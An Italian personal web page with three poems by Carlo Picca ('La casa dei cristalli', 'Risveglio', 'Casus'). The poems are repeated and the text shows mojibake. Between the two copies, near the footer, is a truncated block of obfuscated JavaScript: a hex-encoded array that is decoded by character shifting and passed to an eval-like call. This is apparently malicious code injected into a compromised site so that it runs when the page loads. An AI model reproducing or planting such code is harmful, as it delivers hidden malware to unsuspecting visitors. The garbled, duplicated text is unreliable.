Carlo Picca 

Noicattaro (Bari)  per contattare l'autore: piccacarlo@libero.it

LA CASA DEI CRISTALLI RISVEGLIO CASUS

 

LA CASA DEI CRISTALLI



La casa dei cristalli 
ove si dovrebbe 
andar in punta di piedi
o quantomeno danzare,

ove se non sei sicuro dei tuoi passi
devi saper raccogliere
il fiorellino mascherato .

Nella casa dei cristalli, 
dulše e affettuosa Ŕ l'aria,
solo le passioni sono l'uragano
che tutto lascia quasi intatto .

Nella casa dei cristalli 
quando si Ŕ duri un po' 
Ŕ perchÚ il gatto vi stava 
giuocando con la palla . 

RISVEGLIO


Mi risveglio
e m'accorgo 
che ci sei sempre stata
durante la mia assenza,
ad attendere i nostri occhi 
incontrarsi.

Mi risveglio
e m'accorgo
che i nostri corpi
desiderano la stessa libertÓ
e smetto d'aver paura 
di te.

Che jo te possa ringrasiar
co' parole e carezze 
silenziose.






CASUS


Che avventura
resistere alle forze scatenanti dell'odio.

Che avventura
resistere alla voglia di farsi strada solitaria.

Che avventura
salvare il lume della decenza in condizioni di stress.

Cosa vuoi da me ?
S˛ che sei necessario,

ma ho voglia di sentire i miei piedi per terra.
Avrei voglia di non ripetere l'errore.

Mi darai disturbo come un 
sassolino gettato 
nel lago della mia luciditÓ,
con le acque a tornar a lor forma
prestandosi a giuochi pi¨ abbaglianti.




 

Home page  |  L'autrice del sito  Le pagine del sito     

 

65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1296!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}

 

LA CASA DEI CRISTALLI



La casa dei cristalli 
ove si dovrebbe 
andar in punta di piedi
o quantomeno danzare,

ove se non sei sicuro dei tuoi passi
devi saper raccogliere
il fiorellino mascherato .

Nella casa dei cristalli, 
dulše e affettuosa Ŕ l'aria,
solo le passioni sono l'uragano
che tutto lascia quasi intatto .

Nella casa dei cristalli 
quando si Ŕ duri un po' 
Ŕ perchÚ il gatto vi stava 
giuocando con la palla . 

RISVEGLIO


Mi risveglio
e m'accorgo 
che ci sei sempre stata
durante la mia assenza,
ad attendere i nostri occhi 
incontrarsi.

Mi risveglio
e m'accorgo
che i nostri corpi
desiderano la stessa libertÓ
e smetto d'aver paura 
di te.

Che jo te possa ringrasiar
co' parole e carezze 
silenziose.






CASUS


Che avventura
resistere alle forze scatenanti dell'odio.

Che avventura
resistere alla voglia di farsi strada solitaria.

Che avventura
salvare il lume della decenza in condizioni di stress.

Cosa vuoi da me ?
S˛ che sei necessario,

ma ho voglia di sentire i miei piedi per terra.
Avrei voglia di non ripetere l'errore.

Mi darai disturbo come un 
sassolino gettato 
nel lago della mia luciditÓ,
con le acque a tornar a lor forma
prestandosi a giuochi pi¨ abbaglianti.




 

Home page  |  L'autrice del sito  Le pagine del sito